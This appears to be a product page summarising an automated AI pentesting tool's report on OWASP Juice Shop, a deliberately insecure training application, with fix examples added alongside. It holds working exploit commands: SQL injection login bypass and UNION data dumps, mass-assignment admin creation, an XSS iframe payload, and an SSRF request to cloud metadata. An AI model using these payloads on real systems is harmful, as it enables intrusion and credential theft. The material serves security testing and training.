Shannon identified over 20 high-impact vulnerabilities across the targeted OWASP categories in a single automated run against OWASP Juice Shop, an intentionally insecure web application maintained by OWASP for security training.
The full report is available in the Shannon repository at sample-reports/shannon-report-juice-shop.md.

Executive summary

  • Target: OWASP Juice Shop
  • Assessment Date: September 2025
  • Scope: Authentication, XSS, SQL and Command Injection, SSRF, Authorization testing
  • Total vulnerabilities: 20+ critical and high-severity findings

Key accomplishments

Complete authentication bypass

SQL injection enabling admin access without credentials

Database exfiltration

UNION-based SQL injection extracting entire user database including password hashes

Privilege escalation

Created new administrator account through registration workflow bypass

Authorization bypass (IDOR)

Accessed and modified any user’s private data and shopping cart

SSRF exploitation

Internal network reconnaissance via profile image URL vulnerability

Multiple XSS vectors

Reflected XSS via Angular bypass and JSONP callback exploitation

Vulnerability breakdown

Authentication vulnerabilities (Critical)

Location: POST /rest/user/login (email field)
Severity: Critical
Impact: Complete admin access bypass
Exploit:
curl -X POST http://juice-shop.local:3001/rest/user/login \
  -H "Content-Type: application/json" \
  -d "{\"email\":\"' OR '1'='1' --\",\"password\":\"test\"}"
Proof of impact:
The injected email turns the WHERE clause into email = '' OR '1'='1' -- ..., so the password check is commented out and every user row matches; the first row returned is the admin user, and the response carries an admin JWT for user ID 1 (admin@juice-sh.op) with role "admin".
Code reference: /routes/login.ts:34 - Direct string interpolation in SQL query

Location: POST /rest/user/login
Severity: High
Impact: Account compromise via brute force
No rate limiting on the login endpoint allows unlimited authentication attempts, enabling credential stuffing and password brute-force attacks.

Location: User password storage
Severity: High
Impact: Rapid password recovery from database dumps
Passwords are stored as unsalted MD5 hashes, so any hash extracted via the SQL injection above can be reversed instantly; the admin password hash was cracked in seconds using online rainbow tables.

Authorization vulnerabilities (Critical)

Location: POST /api/Users/ (registration endpoint)
Severity: Critical
Impact: Instant admin privilege escalation
Exploit:
curl -X POST http://juice-shop.local:3001/api/Users/ \
  -H "Content-Type: application/json" \
  -d '{"email":"attacker@example.com","password":"Password123","role":"admin"}'
Successfully created a new admin account through a mass assignment vulnerability: the registration handler writes the client-supplied role field straight into the new user record instead of setting it server-side.

Location: GET /rest/user/{id}
Severity: High
Impact: Horizontal privilege escalation to any user account
No authorization check on the user ID parameter allows accessing any user's profile, including email, address, and payment information.

Location: GET/POST /rest/basket/{id}
Severity: High
Impact: Access and modify any user's shopping cart
Sequential basket IDs with no ownership validation enable viewing and modifying other users' carts.
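An added example, not Shannon's output or Juice Shop's code, of the server-side checks the three Authorization findings above are missing: a field whitelist for the registration body so that `role` can never be mass-assigned, and an ownership check that ties the id in the URL back to the identity in the verified JWT for basket and profile reads. The `AuthError` class, the `UserId`/`id` owner fields and the in-memory maps are constructed for this example.

```javascript
// Added example (not Shannon's or Juice Shop's code): mass-assignment and IDOR fixes.
// Assumes Node.js >= 12; `principal` is the user object decoded from an already
// verified JWT, never anything taken from the request body or URL.
class AuthError extends Error {
  constructor(status, message) { super(message); this.status = status; }
}

// --- Mass assignment fix ----------------------------------------------------
// Passing req.body straight to User.create lets a client set any column,
// including `role`. Copy only the fields a self-registering user may supply
// and pin everything else server-side.
const REGISTRATION_FIELDS = ['email', 'password', 'securityQuestionId', 'securityAnswer'];

function buildNewUser(body) {
  const user = {};
  for (const field of REGISTRATION_FIELDS) {
    if (body[field] !== undefined) user[field] = body[field];
  }
  if (typeof user.email !== 'string' || !/^[^\s@]+@[^\s@]+$/.test(user.email)) throw new AuthError(400, 'invalid email');
  if (typeof user.password !== 'string' || user.password.length < 8) throw new AuthError(400, 'password too short');
  user.role = 'customer';   // never taken from the client
  user.isActive = true;     // likewise
  return user;
}

// --- IDOR fix ---------------------------------------------------------------
// The id in the URL is untrusted input. Customers may only touch objects whose
// owner column matches their own id; admins may touch any. 403 is returned for
// foreign objects; return 404 instead if you also want to hide their existence.
function authorizeOwnership(principal, resource, ownerField) {
  if (!principal) throw new AuthError(401, 'not authenticated');
  if (principal.role === 'admin') return resource;
  if (resource[ownerField] !== principal.id) throw new AuthError(403, 'forbidden');
  return resource;
}

// GET /rest/basket/{id}: baskets are keyed by id, owner stored in UserId.
function getBasket(baskets, principal, basketId) {
  const basket = baskets.get(Number(basketId));
  if (!basket) throw new AuthError(404, 'not found');
  return authorizeOwnership(principal, basket, 'UserId');
}

// GET /rest/user/{id}: same check, plus a projection so the password hash and
// other sensitive columns never leave the server even for the owner.
const PUBLIC_USER_FIELDS = ['id', 'email', 'role', 'profileImage'];

function getUser(users, principal, userId) {
  const user = users.get(Number(userId));
  if (!user) throw new AuthError(404, 'not found');
  authorizeOwnership(principal, user, 'id');
  return Object.fromEntries(PUBLIC_USER_FIELDS.filter(f => f in user).map(f => [f, user[f]]));
}
```

Making basket IDs unpredictable (UUIDs instead of sequential integers) raises the cost of enumeration but is not a substitute for the ownership check, since IDs still leak through order confirmations, logs and referrers.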

SQL injection vulnerabilities (Critical)

Location: GET /rest/products/search (q parameter)
Severity: Critical
Impact: Complete database compromise
Exploit:
curl -s "http://juice-shop.local:3001/rest/products/search?q=xxx%25%27%29%20AND%20description%20LIKE%20%27%25xxx%25%27%29%20UNION%20SELECT%20id,email,password,role,0,0,0,0,0%20FROM%20Users%20LIMIT%205--"
Successfully extracted:
  • All user emails and password hashes
  • User roles (admin, customer)
  • Complete database schema
Code reference: /routes/search.ts:18 - Unsanitized query parameter

Location: Login and search endpoints
Severity: High
Impact: Authentication bypass and mass data manipulation
MongoDB operator injection ($ne, $gt) enables bypassing authentication and bulk data modification.
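An added example, not Shannon's output or Juice Shop's code, that decodes the search payload above and shows what it does to an interpolated query of the shape Juice Shop uses for /rest/products/search, next to the parameterised form in which user input only ever travels as a bound value. The `$pattern` placeholder and `bind` object follow the convention Sequelize's `sequelize.query(sql, { bind })` accepts; the function names and the request-time tripwire at the end are constructed for this example.

```javascript
// Added example (not Shannon's or Juice Shop's code): search SQL injection,
// vulnerable interpolation beside the parameterised query.

// The page's payload, decoded exactly as Express hands req.query.q to the route.
const PAYLOAD = decodeURIComponent(
  'xxx%25%27%29%20AND%20description%20LIKE%20%27%25xxx%25%27%29%20UNION%20SELECT%20id,email,password,role,0,0,0,0,0%20FROM%20Users%20LIMIT%205--');

// Vulnerable: the search term is spliced into the SQL text, so the attacker
// controls quotes, parentheses and keywords. The payload closes both LIKE
// groups, appends a UNION over Users with nine columns to match Products,
// and comments out the rest of the original statement with "--".
function vulnerableSearchSql(criteria) {
  return `SELECT * FROM Products WHERE ((name LIKE '%${criteria}%' OR description LIKE '%${criteria}%') AND deletedAt IS NULL) ORDER BY name`;
}

// LIKE wildcards are escaped so a bound term cannot widen the match either;
// the ESCAPE clause tells SQLite which character we used.
function escapeLike(s) { return s.replace(/[\\%_]/g, ch => '\\' + ch); }

// Parameterised: the SQL text is a constant; the term is passed in `bind` and
// the database never parses it as SQL. Length-capped to blunt LIKE-based DoS.
function safeSearchQuery(criteria, maxLen = 200) {
  const term = String(criteria).slice(0, maxLen);
  return {
    sql: "SELECT * FROM Products WHERE ((name LIKE $pattern ESCAPE '\\' OR description LIKE $pattern ESCAPE '\\') AND deletedAt IS NULL) ORDER BY name",
    bind: { pattern: `%${escapeLike(term)}%` },
  };
}

// Detection-side tripwire for a WAF rule or request log alert: a search term
// carrying a quote together with a statement-changing token. Parameterisation
// is the fix; this only tells you someone is probing.
function looksLikeSqlInjection(criteria) {
  const s = String(criteria);
  return /['"]/.test(s) && /\b(union|select)\b|--|\/\*|;/i.test(s);
}
```

Note that `escapeLike` is about LIKE semantics, not injection: without the bind parameter it would do nothing to stop the UNION, since the quote and parentheses in the payload are untouched by it.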

XSS vulnerabilities (High)

Location: Search functionality
Severity: High
Impact: Session hijacking, credential theft
Exploit:
<iframe src="javascript:alert('XSS')">
Successfully bypassed Angular's sanitization using an iframe-based payload: the search term is rendered as trusted HTML, so the iframe's javascript: URL executes in the victim's session.

Location: JSONP endpoints
Severity: High
Impact: Cross-domain data exfiltration
An unvalidated JSONP callback parameter is echoed verbatim into a script response, allowing arbitrary JavaScript execution for cross-domain attacks.
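An added example, not Shannon's output or Juice Shop's code, for the two XSS findings above. It shows a JSONP responder that only accepts a callback that is a plain JavaScript identifier path, so a value such as `alert(1);//` is rejected instead of being echoed into a script, and the contextual HTML encoding that turns the report's iframe payload into inert text when search input has to be rendered into markup. Function names and the response-object shape are constructed for this example.

```javascript
// Added example (not Shannon's or Juice Shop's code): JSONP callback validation
// and HTML output encoding. Assumes Node.js >= 12; no dependencies.

// A callback may only be an identifier path such as `cb` or `window.parent.cb`.
// Anything with parentheses, quotes, operators or comments is refused.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function jsonpResponse(callbackParam, data) {
  if (typeof callbackParam !== 'string' || callbackParam.length > 64 || !CALLBACK_RE.test(callbackParam)) {
    return { status: 400, headers: { 'Content-Type': 'application/json' },
             body: JSON.stringify({ error: 'invalid callback' }) };
  }
  // JSON is not quite a JS subset: U+2028/U+2029 are legal in JSON strings but
  // line terminators in JS source, so escape them. The leading /**/ comment
  // stops the response being reinterpreted as another file type (Rosetta Flash),
  // and nosniff pins the script content type.
  const json = JSON.stringify(data).replace(/\u2028/g, '\\u2028').replace(/\u2029/g, '\\u2029');
  return {
    status: 200,
    headers: { 'Content-Type': 'text/javascript; charset=utf-8', 'X-Content-Type-Options': 'nosniff' },
    body: `/**/${callbackParam}(${json});`,
  };
}

// Contextual encoding for HTML text and attribute content. This is what the
// search page needs instead of bypassSecurityTrustHtml: the iframe payload is
// displayed, not parsed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(s) { return String(s).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]); }

function renderSearchHeading(term) {
  return `<h2>Search results for <strong>${escapeHtml(term)}</strong></h2>`;
}
```

`escapeHtml` covers HTML text and quoted attribute values only; a value placed into a URL attribute, an inline event handler or a script block needs that context's own encoder, and `javascript:` URLs must be rejected outright.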

SSRF vulnerabilities (High)

Location: POST /profile/image/url
Severity: High
Impact: Internal network reconnaissance, cloud metadata access
Exploit:
curl -X POST http://juice-shop.local:3001/profile/image/url \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -b "token=$TOKEN" \
  -d '{"imageUrl":"http://169.254.169.254/latest/meta-data/"}'
(The Content-Type header is required for the JSON body to be parsed; Juice Shop's profile routes read the session from the token cookie, so it is sent alongside the Authorization header.)
The server fetches whatever URL is supplied, with no scheme or destination restriction. Successfully accessed:
  • Internal services (Solr, Redis)
  • Cloud metadata endpoints
  • File system via file:// protocol

Additional findings

Location: XML upload endpoints
Severity: High
Impact: Local file read access
External entity injection in the XML parser enables reading arbitrary files from the server file system.

Location: Configuration upload
Severity: Medium
Impact: Denial of service
Unsafe YAML deserialization allows resource exhaustion attacks.

Location: Deluxe membership, checkout flow
Severity: High
Impact: Payment bypass, order manipulation
Multiple business logic flaws enable:
  • Free deluxe membership activation
  • Checking out other users' carts
  • Negative pricing via coupon stacking

Impact summary

Combined impact: These vulnerabilities provide complete application compromise:
  1. Full authentication bypass via SQL injection
  2. Complete database access with user credentials and payment data
  3. Privilege escalation to admin via registration bypass
  4. Horizontal access to all user accounts via IDOR
  5. Internal network access via SSRF
  6. Session hijacking via XSS

Statistics

  Metric                  Value
  Total vulnerabilities   20+
  Critical severity       8
  High severity           12+
  Runtime                 1.5 hours
  API cost                ~$50 USD
  False positives         0

Full report

View the complete report on GitHub

OWASP Juice Shop

Official Juice Shop repository

Run your own test

Test Shannon against Juice Shop

Benchmark results

96.15% success rate on XBOW
